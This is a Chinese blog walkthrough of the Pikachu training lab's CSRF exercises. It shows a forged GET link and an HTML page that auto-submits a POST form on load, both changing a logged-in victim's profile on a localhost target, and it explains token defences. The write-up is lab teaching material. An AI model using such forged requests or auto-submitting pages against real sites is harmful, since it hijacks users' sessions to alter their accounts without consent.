Pikachu靶场:CSRF(GET)、CSRF(POST)以及CSRF(token)

最新推荐文章于 2024-05-08 12:11:16 发布
最新推荐文章于 2024-05-08 12:11:16 发布
阅读量3.7k 收藏 14
点赞数 2
分类专栏: Pikachu靶场实战 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/witwitwiter/article/details/115835156
版权

Pikachu靶场:CSRF(GET)、CSRF(POST)以及CSRF(token)

实验环境以及工具

Firefox浏览器、Burp Suite、Pikachu靶场

实验原理

Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。

CSRF的主要问题是敏感操作的链接容易被伪造,那么如何让这个链接不容易被伪造?
每次请求,都增加一个随机码(需要够随机,不容易伪造),后台每次对这个随机码进行验证!

具体实施

CSRF(GET)

1.受害者登录

用户lucy登录

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-caIJ7QEN-1618736504967)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210418154327648.png)]

修改手机号为123456789住址usa为wuhan邮箱改为lucy@163.com

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CybcgrCq-1618736504969)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210418155146838.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RGiSzbQg-1618736504971)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210418155325034.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HxtKIUy1-1618736504974)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210418155358964.png)]

2.伪造链接

将GET请求复制下来

GET /Pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=123456789&add=wuhan&email=lucy%40163.com&submit=submit

修改部分内容,这里吧住址wuhan改为beijing并改成URL发送

http://127.0.0.1/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=123456789&add=beijing&email=lucy%40163.com&submit=submit

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hlqlwUT1-1618736504975)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210418160752506.png)]

CSRF(POST)

1.受害者登录

受害者修改住址为wuhan

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-zBp5B7M1-1618736504977)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210418163207055.png)]

这样就不能利用在URL修改信息来篡改受害者信息。

2.搭建恶意网站

搭建一个恶意网站将受害者信息进行修改,这里是将住址从wuhan改为hubei

<html>
<head>
<script>
window.onload = function() {
  document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://127.0.0.1/pikachu/vul/csrf/csrfpost/csrf_post_edit.php">
    <input id="sex" type="text" name="sex" value="girl" />
    <input id="phonenum" type="text" name="phonenum" value="123456789" />
    <input id="add" type="text" name="add" value="hubei" />
    <input id="email" type="text" name="email" value="lucy@163.com" />
    <input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>

并将恶意网站URL发送给受害者

http://127.0.0.1/Pikachu/vul/csrf/csrfpost/post123.html

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QG51sTsZ-1618736504978)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210418164416736.png)]

成功修改了受害者的信息。

CSRF(token)

受害者登录并将住址修改为wuhan

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KCu5bz7f-1618736504979)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210418164842346.png)]

GET /pikachu/vul/csrf/csrftoken/token_get_edit.php?
sex=lucy
&phonenum=123456789
&add=wuhan
&email=lucy%40163.com
&token=15902607bf21f29fd3019665073
&submit=submit HTTP/1.1

其中token的值每次请求都会发生变化,所以攻击者不能用自己的token对受害者进行攻击。

总结

CSRF是借用受害者的权力进行攻击,与xss和其他越权漏洞不同,它没有实质性的拥有受害者的权力。CSRF的攻击条件非常苛刻,需要目标网站有CSRF漏洞,要受害者进行登录,受害者点击恶意链接。token能够很好的防御CSRF攻击。

witwitwiter
关注
  • 2
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pikachu,dvwa的csrf详细步骤
05-17
1. CSRF(跨站请求伪造):CSRF是一种网络攻击方式,攻击者通过构造恶意请求,利用受害者在目标网站上的已登录身份执行非预期的操作。在这个例子中,Pikachu和DVWA(Damn Vulnerable Web Application)是用于教学...
web渗透教程1:pikachu靶场搭建
11-17
带你手把手搭建pikachu靶场环境
Pikachu-CSRF
baynk的博客
11-18 1268
0x00 CSRF概述 如果知道CSRF的就可以不用看了,这篇一点技术含量都没。。。纯属为了保证阵型才写。 CSRF(跨站请求伪造)概述 Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。...
pikachu靶场--CSRF--get/post/token【3.1】~【3.3】
lmei1228的博客
06-08 253
当然,如果小黑事先在xxx网的首页如果发现了一个XSS漏洞,则小黑可能会这样做: 欺骗小白访问埋伏了XSS脚本(盗取cookie的脚本)的页面,小白中招,小黑拿到小白的cookie,然后小黑顺利登录到小白的后台,小黑自己修改小白的相关信息。---所以跟上面比一下,就可以看出CSRF与XSS的区别:CSRF是借用户的权限完成攻击,攻击者并没有拿到用户的权限,而XSS是直接盗取到了用户的权限,然后实施破坏。所以小黑想要修改大白的信息,他需要拥有:1,登录权限 2,修改个人信息的请求。
Pikachu 靶场 CSRF 通关解析
最新发布
Flag少侠的博客
05-08 2110
CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种常见的Web应用程序安全漏洞,它允许攻击者在用户不知情的情况下以受害者的身份执行未经授权的操作。CSRF攻击利用了Web应用程序对用户的信任。攻击者通过诱使用户访问恶意网站或点击恶意链接,使受害者在已登录的状态下访问目标网站。然后,攻击者利用受害者的身份在目标网站上执行恶意请求,例如转账、更改密码或删除数据。以下是CSRF攻击的一般工作流程1. 受害者登录:受害者在目标网站上进行登录,并获得有效的会话凭证。
pikachu--CSRF实验演练
m0_54024658的博客
06-18 434
CSRF概述 Cross-site request forgery 简称为“CSRF”,中文名称==跨站请求伪造==在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。 很多人搞不清楚CSRF的概念,甚至有时候会将其和XSS混淆,更有甚者会将其和越权问题混为一谈,这都是对原理没搞清楚导致的。 CSRF与XSS的区别 CSRF是借用户的权限完成攻击,攻击者并没有拿到用户的
pikachu csrf(get)
ANYOUZHEN的博客
05-04 364
抓包,观察get里面的内容,add表示地址的意思,将地址修改为beijing,然后将url替换get,完成伪装,只要让对方点击改伪造链接,即可达成修改地址的目的
PikachuCSRF
weixin_48621644的博客
10-17 1920
小羊学安全 任重而道远~
Pikachu靶场——跨站请求伪造(CSRF)
来日可期的博客
10-07 1174
全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密码等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。
Pikachu-----CSRF(跨站请求伪造)
m0_65712192的博客
12-19 1433
Pikachu-----CSRF(跨站请求伪造)
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu靶场全通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
pikachu靶场环境
02-12
在"Pikachu靶场"中,用户通常会遇到各种网络安全挑战,包括但不限于Web应用漏洞挖掘(如SQL注入、XSS跨站脚本攻击、文件包含漏洞等)、网络服务漏洞利用(如FTP、SMTP、SSH等服务的漏洞)、密码学概念应用(如加密与...
pikachu靶场CSRFTOKEN绕过
黄乔国PHP
03-08 1886
Pikachu靶场中的CSRF漏洞环节里面有一关CSRF TOKEN,这个关卡和其余关卡稍微有点不一样,因为表单里面存在一个刷新就会变化的token,那么这个token是否能绕过呢?接下来我们来仔细分析分析。
pikachu靶场练习——CSRF详解
qq_42176496的博客
09-05 2365
pikachu靶场——CSRF详解
CSRF(get)操作演示--pikachu
weixin_45873667的博客
05-19 141
先登录进入到会员界面,用户名和密码是kobe和123456. 我们修改个人信息,这里我们修改住址信息:改为wuhan,点击提交。 那我们如何确认这个地方是否存在CSRF漏洞呢?可以知道这是一个敏感信息的修改。 通过抓包查看到我们刚刚提交的修改信息。 将其中的get信息复制下来。 GET /pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=15988767673&add=wuhan&email=kobe%40pik.
DVWA-csrf
告白的博客
07-28 438
0x00 漏洞介绍 CSRF全称为跨站请求伪造(Cross-site request forgery),是一种网络攻击方式,也被称为 one-click attack 或者 session riding。 CSRF攻击利用网站对于用户网页浏览器的信任,挟持用户当前已登陆的Web应用程序,去执行并非用户本意的操作。 用户登录、浏览并信任正规网站WebA,同时,WebA通过用户的验证并在用户的浏览器中产生Cookie。 简单理解:将即将支付网址连接盗取,将伪造站点操作代码放在csrf伪造站点,当点击伪造站点自动
pikachu靶场
weixin_44178492的博客
10-08 2831
暴力破解 基于表单的暴力破解 1.首先打开靶场,挂上代理(127.0.0.1默认不抓包,所以写本机的ip地址) 2.抓到数据包 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传 3.发送到intuder(暴力破解)模块,点击clear清除掉变量,再将username字段和password字段的值设为变量,并选择cluster bomb(集束炸弹)模式 username=§dsadsa§&password=§dsada§&submit=Login 4.在payload中选
pikachu靶场-CSRF(跨站请求伪造)
qq_44655084的博客
12-30 1137
Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。
pikachu靶场CSRF
10-03
pikachu靶场中的CSRF(Cross-Site Request Forgery)是一种常见的Web安全漏洞,它允许攻击者利用受信任用户的身份执行未经授权的操作。CSRF攻击发生在用户在一个网站上登录之后,在没有退出该网站的情况下,访问另一个恶意网站时触发。 具体来说,在pikachu靶场中,CSRF攻击主要发生在GET请求中。攻击者可通过构造特定的URL,诱使用户点击,从而执行恶意操作。在登录过程中,pikachu靶场中有多个账号可供使用,如vince、allen、kobe、grady、kevin、lucy和lili,密码均为123456。 与XSS(Cross-Site Scripting)攻击相比,CSRF攻击的利用条件更为复杂,因此CSRF的安全级别相对较低。 为了防止CSRF攻击,pikachu靶场采取了一些防护措施,如使用CSRF Token来验证请求的合法性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值